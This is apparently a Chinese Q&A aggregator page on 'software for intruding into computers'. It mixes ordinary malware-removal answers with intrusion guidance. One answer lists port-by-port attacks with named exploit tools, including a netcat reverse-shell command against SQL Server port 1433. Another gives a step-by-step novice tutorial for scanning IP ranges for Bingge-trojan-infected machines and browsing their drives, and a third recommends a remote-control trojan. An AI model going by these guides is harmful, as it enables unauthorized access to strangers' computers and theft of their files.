导航:首页 > 软件大全 > 入侵电脑软件

入侵电脑软件

发布时间:2022-01-07 02:02:13

什么软件能用我的计算机入侵别人的邮箱,或者电脑。

黑客是入侵别人电脑的方法有9种。 1、获取口令 这又有三种方法:一是通过网络监听非法得到用户口令,这类方法有一定的局限性,但危害性极大,监听者往往能够获得其所在网段的所有用户账号和口令,对局域网安全威胁巨大;二是在知道用户的账号后(如电子邮件@前面的部分)利用一些专门软件强行破解用户口令,这种方法不受网段限制,但黑客要有足够的耐心和时间;三是在获得一个服务器上的用户口令文件(此文件成为Shadow文件)后,用暴力破解程序破解用户口令,该方法的使用前提是黑客获得口令的Shadow文件。此方法在所有方法中危害最大,因为它不需要像第二种方法那样一遍又一遍地尝试登录服务器,而是在本地将加密后的口令与Shadow文件中的口令相比较就能非常容易地破获用户密码,尤其对那些弱智用户(指口令安全系数极低的用户,如某用户账号为zys,其口令就是zys666、666666、或干脆就是zys等)更是在短短的一两分钟内,甚至几十秒内就可以将其干掉。 2、放置特洛伊木马程序 特洛伊木马程序可以直接侵入用户的电脑并进行破坏,它常被伪装成工具程序或者游戏等诱使用户打开带有特洛伊木马程序的邮件附件或从网上直接下载,一旦用户打开了这些邮件的附件或者执行了这些程序之后,它们就会象古特洛伊人在敌人城外留下的藏满士兵的木马一样留在自己的电脑中,并在自己的计算机系统中隐藏一个可以在Windows启动时悄悄执行的程序。当您连接到因特网上时,这个程序就会通知黑客,来报告您的IP地址以及预先设定的端口。黑客在收到这些信息后,再利用这个潜伏在其中的程序,就可以任意地修改您的计算机的参数设定、复制文件、窥视你整个硬盘中的内容等,从而达到控制你的计算机的目的。 3、WWW的欺骗技术 在网上用户可以利用IE等浏览器进行各种各样的WEB站点的访问,如阅读新闻组、咨询产品价格、订阅报纸、电子商务等。然而一般的用户恐怕不会想到有这些问题存在:正在访问的网页已经被黑客篡改过,网页上的信息是虚假的!例如黑客将用户要浏览的网页的URL改写为指向黑客自己的服务器,当用户浏览目标网页的时候,实际上是向黑客服务器发出请求,那么黑客就可以达到欺骗的目的了。 4、电子邮件攻击 电子邮件攻击主要表现为两种方式:一是电子邮件轰炸和电子邮件“滚雪球”,也就是通常所说的邮件炸弹,指的是用伪造的IP地址和电子邮件地址向同一信箱发送数以千计、万计甚至无穷多次的内容相同的垃圾邮件,致使受害人邮箱被“炸”,严重者可能会给电子邮件服务器操作系统带来危险,甚至瘫痪;二是电子邮件欺骗,攻击者佯称自己为系统管理员(邮件地址和系统管理员完全相同),给用户发送邮件要求用户修改口令(口令可能为指定字符串)或在貌似正常的附件中加载病毒或其他木马程序(据笔者所知,某些单位的网络管理员有定期给用户免费发送防火墙升级程序的义务,这为黑客成功地利用该方法提供了可乘之机),这类欺骗只要用户提高警惕,一般危害性不是太大。 5、通过一个节点来攻击其他节点 黑客在突破一台主机后,往往以此主机作为根据地,攻击其他主机(以隐蔽其入侵路径,避免留下蛛丝马迹)。他们可以使用网络监听方法,尝试攻破同一网络内的其他主机;也可以通过IP欺骗和主机信任关系,攻击其他主机。这类攻击很狡猾,但由于某些技术很难掌握,如IP欺骗,因此较少被黑客使用。 6、网络监听 网络监听是主机的一种工作模式,在这种模式下,主机可以接受到本网段在同一条物理通道上传输的所有信息,而不管这些信息的发送方和接受方是谁。此时,如果两台主机进行通信的信息没有加密,只要使用某些网络监听工具,例如NetXray for windows 95/98/nt,sniffit for linux 、solaries等就可以轻而易举地截取包括口令和帐号在内的信息资料。虽然网络监听获得的用户帐号和口令具有一定的局限性,但监听者往往能够获得其所在网段的所有用户帐号及口令。 7、寻找系统漏洞 许多系统都有这样那样的安全漏洞(Bugs),其中某些是操作系统或应用软件本身具有的,如Sendmail漏洞,win98中的共享目录密码验证漏洞和IE5漏洞等,这些漏洞在补丁未被开发出来之前一般很难防御黑客的破坏,除非你将网线拔掉;还有一些漏洞是由于系统管理员配置错误引起的,如在网络文件系统中,将目录和文件以可写的方式调出,将未加Shadow的用户密码文件以明码方式存放在某一目录下,这都会给黑客带来可乘之机,应及时加以修正。 8、利用帐号进行攻击 有的黑客会利用操作系统提供的缺省账户和密码进行攻击,例如许多UNIX主机都有FTP和Guest等缺省账户(其密码和账户名同名),有的甚至没有口令。黑客用Unix操作系统提供的命令如Finger和Ruser等收集信息,不断提高自己的攻击能力。这类攻击只要系统管理员提高警惕,将系统提供的缺省账户关掉或提醒无口令用户增加口令一般都能克服。 9、偷取特权 利用各种特洛伊木马程序、后门程序和黑客自己编写的导致缓冲区溢出的程序进行攻击,前者可使黑客非法获得对用户机器的完全控制权,后者可使黑客获得超级用户的权限,从而拥有对整个网络的绝对控制权。这种攻击手段,一旦奏效,危害性极大。

⑵ 电脑被流氓软件入侵,该怎么处理

朋友,这是你的电脑“丢失”或“误删”了“系统文件”,或“系统文件”被病

毒和“顽固”木马“破坏”,我给你8套方案!(一般是:可疑启动项)

(答案原创,严禁盗用,如有雷同,纯属山寨!)

(提示:360急救箱不能联网,就先用:(5)网络修复,重启电脑,或者使

用:离线模式)

1.下载个:“360系统急救箱”!(安全模式下,联网使用,效果更好!)

(注意:已经安装了“360安全卫士”的朋友,直接打开“木马云查杀”,

点击:快速扫描,扫描结束后,中间有:没有问题,请用360急救箱,点击它!)

【1】先点:“开始急救”查杀病毒,删除后,“立即重启”!

【2】重启开机后,再点开“文件恢复区”,全选,点:“彻底删除文件”和“可

疑启动项”!

【3】再点开“系统修复”,“全选”,再“立即修复”文件!(关键一步)

【4】再点开:“dll文件恢复”,扫描一下,如果没有就行了,如果有丢失,添

加恢复,手动添加,立即恢复!

【5】点开:“网络修复”,点:“开始修复”,重启电脑!(关键一步)

2。用“360安全卫士”里“系统修复”,点击“使用360安全网址导航”,“一

键修复”!(关键一步)

3。用“360安全卫士”的“扫描插件”,然后再“清理插件”,把它删除!

4。再用“360杀毒双引擎版”,勾选“自动处理扫描出的病毒威胁”,用“全盘

扫描”和“自定义扫描”,扫出病毒木马,再点删除!

重启电脑后,来到“隔离区”,点“彻底删除”!

5。使用360安全卫士的“木马查杀”,全盘扫描,完毕再“自定义扫描”!

扫出木马或恶意病毒程序,就点删除!

重启电脑后,来到“文件恢复区”,点“彻底删除”!

6。如果还是不行,试试:“金山急救箱”的扩展扫描和“金山网盾”,一键修

复!或者:可牛免费杀毒,浏览器医生,浏览器修复,立即扫描,立即修复!

7。再不行,重启电脑,开机后,按F8,回车,回车,进到“安全模式”里,

“高级启动选项”里,“最后一次正确配置”,按下去试试,看看效果!

8。实在不行,做“一键还原”系统!(方法:我的网络空间的博客里有)

⑶ 电脑被流氓软件入侵了咋办

以我的意见,就是格式化C盘,重做操作系统。
这是你的电脑“丢失”或“误删”了“系统文件”,或“系统文件”被病

毒和“顽固”木马“破坏”,我给你8套方案!(一般是:可疑启动项)

(答案原创,严禁盗用,如有雷同,纯属山寨!)

(提示:360急救箱不能联网,就先用:(5)网络修复,重启电脑,或者使

用:离线模式)

1.下载个:“360系统急救箱”!(安全模式下,联网使用,效果更好!)

(注意:已经安装了“360安全卫士”的朋友,直接打开“木马云查杀”,

点击:快速扫描,扫描结束后,中间有:没有问题,请用360急救箱,点击它!)

【1】先点:“开始急救”查杀病毒,删除后,“立即重启”!

【2】重启开机后,再点开“文件恢复区”,全选,点:“彻底删除文件”和“可

疑启动项”!

【3】再点开“系统修复”,“全选”,再“立即修复”文件!(关键一步)

【4】再点开:“dll文件恢复”,扫描一下,如果没有就行了,如果有丢失,添

加恢复,手动添加,立即恢复!

【5】点开:“网络修复”,点:“开始修复”,重启电脑!(关键一步)

2。用“360安全卫士”里“系统修复”,点击“使用360安全网址导航”,“一

键修复”!(关键一步)

3。用“360安全卫士”的“扫描插件”,然后再“清理插件”,把它删除!

4。再用“360杀毒双引擎版”,勾选“自动处理扫描出的病毒威胁”,用“全盘

扫描”和“自定义扫描”,扫出病毒木马,再点删除!

重启电脑后,来到“隔离区”,点“彻底删除”!

5。使用360安全卫士的“木马查杀”,全盘扫描,完毕再“自定义扫描”!

扫出木马或恶意病毒程序,就点删除!

重启电脑后,来到“文件恢复区”,点“彻底删除”!

6。如果还是不行,试试:“金山急救箱”的扩展扫描和“金山网盾”,一键修

复!或者:可牛免费杀毒,浏览器医生,浏览器修复,立即扫描,立即修复!

7。再不行,重启电脑,开机后,按F8,回车,回车,进到“安全模式”里,

“高级启动选项”里,“最后一次正确配置”,按下去试试,看看效果!

8。实在不行,做“一键还原”系统!

⑷ 电脑入侵需要什么工具

. 1433端口入侵

scanport.exe 查有1433的机器

SQLScanPass.exe 进行字典暴破(字典是关键)

最后 SQLTools.exe入侵

对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。

nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口

(以上反向的,测试成功)

sqlhelloz.exe 入侵ip 1433 (这个是正向连接)

2. 4899端口入侵

用4899过滤器.exe,扫描空口令的机器

3. 3899的入侵

对很早的机器,可以试试3389的溢出(win3389ex.exe)

对2000的机器,可以试试字典暴破。(tscrack.exe)

4. 80入侵

对sp3以前的机器,可以用webdav入侵;

对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)

可以利用SQL进行注入。(啊D的注入软件)。

5. serv-u入侵(21端口)

对5. 004及以下系统,可用溢出入侵。(serv5004.exe)

对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)

对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)

输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码

6. 554端口

用real554.exe入侵。

7. 6129端口

用DameWare6129.exe入侵。

8. 系统漏洞

利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,

进行溢出入侵。

9. 3127等端口

可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。

⑸ 求一个能够入侵任意一台局域网电脑的软件

局域网,如果是网吧的话,把自己所在的机器注册成主机即可,如果是无主机局域网的话,只能用远控了.

⑹ 电脑老是被流氓软件给入侵,请问有哪些软件可以拦截的

恐怕没有。一些流氓软件都是付费后被一些软件带入你的电脑的。要想没有流氓软件,就是付费购买正版软件。

⑺ 电脑被流氓软件入侵了,怎么办

朋友,你好:
可以按下面二步,就可以解决:

第一步:卸载这些垃圾软件,可以在软件管家中卸载,也可以在程序和功能中卸载,从源头上删除这些软件。
第二步:安装火绒安全软件,安装成功后,打开这个软件,在安全工具中,点击弹窗拦截,就可以拦截下载软件和弹广告了。
通过这二步,你的电脑就可以解决自动安装流氓软件和弹窗广告。
希望对你有所帮助,祝你快乐~~

⑻ 可以用什么软件入侵别人的电脑

看了就算你是新手也会入侵电脑了

本文主要讲述用木马攻击别人电脑,国产木马冰河2.2很不错的软件,看完本文后你可以准备一下软件,来试试。呵呵

别做违法的事情哦。本文的主要目的是让大家了解木马的攻击过程,熟悉了,就好防范了。

开始了。。。

步骤如下:

首先的第一步是:

所谓磨刀不误砍柴工嘛。。。

下载必备的工具软件。1号软件就是端口扫描工具“网络刺客II”,2号软件就是着名的国产木马冰河2.2的控制端。

下载完毕并解压缩之后跟我进行第二步!

第二步

运行1号软件,首先出现的是“网络刺客II注册向导”,别理它,点击“稍后(Q)”就进入了网络刺客II的主界面。

第三步

在网络刺客II的主界面里选“工具箱(U)”-》“主机查找器(H)”,就进入了“搜索因特网主机”界面。

第四步

进入“搜索因特网主机”界面后,“起始地址”栏填XXX.XXX.0.0其中XXX.XXX自己去选择了,比如你可以选61.128或选61.200 等等,“结束地址”栏填XXX.XXX.255.255其中XXX.XXX的选择要和前面一样。“端口”栏填7626,其他栏保持默认不动。

好了,以上设置就是要搜索从XXX.XXX.0.0到XXX.XXX.255.255这一段IP地址中有冰河木马的计算机了,再检查一下填对没有?如果一切OK,请点击“开始搜索”。

第五步

观察“总进度”和“段进度”是否在走动。如果没有走动,那一定是IP地址设置不对,请认真检查。如果两个进度都在走动,呵呵,你就成功一半了,至少你会使用网络刺客II扫描网上开放某一端口的计算机了。

下面你要作的就是静静的等待,学用黑客软件是需要耐心的。大约20-30分钟后,最下面的记录栏里就应该出现记录了(一般情况下,应该有5、6条记录)。每一条记录代表找到的中了冰河木马的一台计算机,前面是该计算机的IP地址,后面是7626(冰河木马端口)。

第六步

点击“停止搜索”,但不要退出程序,到第十二步时还要用。运行2号软件冰河,进入冰河主界面。选“文件[F]”-》“添加主机[A]”进入添加主机窗口。

第七步

在“添加主机”窗口,“显示名称”里填入第五步里搜索到的第一条IP地址,当IP地址填入“显示名称”里后,“主机地址”里就自动填入相同的IP了。“访问口令”不填,“监听端口”保持默认的7626。

好了,检查一下IP有没有填错,如果OK,点击“确定”,在冰河主界面的“文件管理器”里就出现了刚才填入的IP地址了。

第八步

这一步和下一步最重要,请认真看清楚!在冰河的主界面里,点击“文件管理器”里的“我的电脑”,这时“文件管理器”右边的框里就会出现你自己的硬盘分区。比如,如果你的硬盘分的是四个区,“文件管理器”右边的框里就会从上往下依次出现C:、D:、E:、F:,如果你的硬盘分的是两个区,就会出现C:、 D:。

第九步

点击“文件管理器”里刚才输入的第一条IP地址,稍等片刻(网速慢的情况下约10-30秒),在“文件管理器”右边的框里就会出现对方计算机的硬盘分区了。看到了吗?看到了?呵呵,祝贺你,你已经成功地进入对方的计算机了!!!!!

第十步

你发现没有出现对方计算机的硬盘分区!!呵呵,别急,看看冰河主界面最下端的状态栏里有什么提示,如果是下面两种情况,就放弃,返回第七步,填入搜索到的第二条IP地址:

1、状态栏里出现“口令不对”、“口令错误”、“密码不对”、“密码错误”等之类的提示,表示该计算机的冰河木马是加了密码的,没有办法,只得放弃!

2、状态栏里出现“正在解释命令,可能是1.2以前版本”等之类的提示,也放弃,新手是搞不定的,如果以后你熟练了可以给对方升级,这是后话!!

第十一步

如果出现的是“主机没有响应”、“无法与主机建立连接”之类的提示,先别忙放弃,重复3-4遍第八步到第九步的操作,即点击“我的电脑”-》点击输入的IP地址,如此反复3-4遍后,还是不行的话再放弃,返回第七步,填入搜索到的下一条IP地址。

第十二步

如果所有搜索到的IP地址按照第七步至第十一步操作后都不能进入对方计算机,呵呵,那是你的运气太差!别急,这样的运气是经常碰到的!再返回第五步,在“搜索因特网主机”界面里点击“开始搜索”,这时该程序又从你停止的IP地址接着往下搜索了!!呵呵,等吧!!搜索吧!!只要你有时间,你一定能成功!

第十三步

终于成功了!我见到对方计算机硬盘分区了!呵呵,怎么样?你成功了,我的任务就完成了。进入对方计算机后,所有的操作和自己计算机“文件管理器”里的操作一模一样!就没什么黑不到过来的了!

这道快餐是专门为从来没有通过网络进入过对方计算机的网络新手们准备的,主要使用的软件就是着名的国产木马冰河2.2,所以,如果你已经使用过冰河2.2,就不必跟着我们往下走了。其他有兴趣的网络新手们,嘿嘿,开始吧,开始你的木马旅程。。。

⑼ 谁有最强大的强行侵入别人电脑的软件

10分就想换一个
最强大的强行侵入别人电脑的软件?
并且可以控制他的电脑的.
要求方便点.无病毒.
你太吝啬了。。。
ps:看你很想KILL人得样子
上兴2008
自己想办法弄

⑽ 我电脑被流氓软件入侵了,求解救

朋友,你好:
这是因为你的电脑上面安装了一些流氓垃圾软件,而这些垃圾软件会自动启动,而且还会自动安装,所以可以按下面二步,就可以解决:
第一步:卸载这些垃圾软件,可以在软件管家中卸载,也可以在程序和功能中卸载,从源头上删除这些软件。
第二步:安装火绒安全软件,安装成功后,打开这个软件,在安全工具中,点击弹窗拦截,就可以拦截下载软件和弹广告了。
通过这二步,你的电脑就可以解决自动安装流氓软件和弹窗广告。
希望对你有所帮助,祝你快乐~~

阅读全文

与入侵电脑软件相关的资料

热点内容
电脑安装数位板时出错 浏览:716
红米手机用wifi连接电脑 浏览:322
电脑里的共享在哪里找 浏览:952
电脑怎么和主机连接打印机共享打印机 浏览:328
苹果电脑下wps 浏览:121
笔记本电脑开无线网卡 浏览:104
手机将照片变年轻软件 浏览:566
远程电脑在哪个位置 浏览:393
电脑风扇怎么清洗 浏览:323
怎么换苹果电脑壁纸 浏览:998
苹果电脑充电口是什么类型 浏览:189
老电脑鼠标怎么设置 浏览:210
苹果电脑主机箱 浏览:975
手机屏幕激光爆炸软件 浏览:34
22寸电脑显示屏多少 浏览:243
平板电脑休眠黑屏 浏览:125
苹果最好用的拨号软件 浏览:942
老版电脑怎么升win10 浏览:528
procreate怎么安装到苹果电脑里呀 浏览:329
电脑用于哪些用途 浏览:49